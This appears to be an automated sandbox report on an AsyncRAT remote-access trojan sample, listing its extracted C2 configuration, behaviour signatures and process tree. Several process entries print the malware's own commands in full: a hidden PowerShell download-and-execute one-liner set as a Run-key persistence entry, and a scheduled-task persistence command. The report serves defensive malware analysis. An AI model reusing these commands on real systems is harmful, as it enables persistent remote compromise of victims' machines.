Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    05/09/2026, 05:16

General

  • Target
    ac6a360cc6399fabee26433c4f233afe0d8d540c45105fb729ec4da39a015351.exe
  • Size 53KB
  • Sample260905-fykzkstyex
  • SHA256 ac6a360cc6399fabee26433c4f233afe0d8d540c45105fb729ec4da39a015351
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Extracted

Language
  • ps1

Deobfuscated
Source
URLs
  • ps1.dropper

    http://trungnguyen.co.za/load.ps1

Extracted

Family
  • asyncrat

Version
  • 0.5.8

Botnet
  • Default

C2
  • trungnguyen.co.za:8080

  • trungnguyen.co.za:443

Mutex
  • nHWk67X8IoFW

Attributes
  • delay

    3

  • install

    true

  • install_file

    tele@engineer_at_meta.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • Family: AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Executes a command shell one-liner 1 TTPs 5 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac6a360cc6399fabee26433c4f233afe0d8d540c45105fb729ec4da39a015351.exe
    "C:\Users\Admin\AppData\Local\Temp\ac6a360cc6399fabee26433c4f233afe0d8d540c45105fb729ec4da39a015351.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
      2⤵
      • Executes a command shell one-liner
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:828
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:60
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "tele@engineer_at_meta" /tr '"C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe"' & exit
      2⤵
      • Executes a command shell one-liner
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3544
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "tele@engineer_at_meta" /tr '"C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe"'
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2104
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5F1F.tmp.bat""
      2⤵
      • Executes a command shell one-liner
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\SysWOW64\timeout.exe
        timeout 3
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2020
      • C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe
        "C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
          4⤵
          • Executes a command shell one-liner
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2532
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:2684
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')"
    1⤵
    • Badlisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4628
  • C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe
    "C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
      2⤵
      • Executes a command shell one-liner
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "QH88UpdateService" /t REG_SZ /d "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://trungnguyen.co.za/load.ps1')\"" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:2836

Network

        MITRE ATT&CK Enterprise v16

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        __PSScriptPolicyTest_35jouc3f.hzb.ps1

        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_35jouc3f.hzb.ps1
        • Size 60B
        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
        • MD5 SHA1 SHA512 TLSH

        tmp5F1F.tmp.bat

        • Path C:\Users\Admin\AppData\Local\Temp\tmp5F1F.tmp.bat
        • Size 165B
        • SHA256 a0b9e27e1051ce873ecb800b71f5096ef372240b6d1aac5af4202bce25c6b189
        • MD5 SHA1 SHA512 TLSH

        tele@engineer_at_meta.exe

        • Path C:\Users\Admin\AppData\Roaming\tele@engineer_at_meta.exe
        • Size 53KB
        • SHA256 ac6a360cc6399fabee26433c4f233afe0d8d540c45105fb729ec4da39a015351
        • MD5 SHA1 SHA512 SSDEEP TLSH

        memory/1872-18-0x00000000064E0000-0x000000000657C000-memory.dmp

        memory/1872-1-0x00000000058F0000-0x0000000005900000-memory.dmp

        memory/1872-0-0x0000000000EA0000-0x0000000000EB4000-memory.dmp

        memory/1872-12-0x00000000058F0000-0x0000000005900000-memory.dmp

        memory/4628-2-0x0000016D74C00000-0x0000016D74C10000-memory.dmp

        memory/4628-14-0x0000016D74C00000-0x0000016D74C10000-memory.dmp

        memory/4628-15-0x0000016D74C00000-0x0000016D74C10000-memory.dmp

        memory/4628-13-0x0000016D74C00000-0x0000016D74C10000-memory.dmp

        memory/4628-9-0x0000016D74A60000-0x0000016D74A82000-memory.dmp

        memory/4628-3-0x0000016D74C00000-0x0000016D74C10000-memory.dmp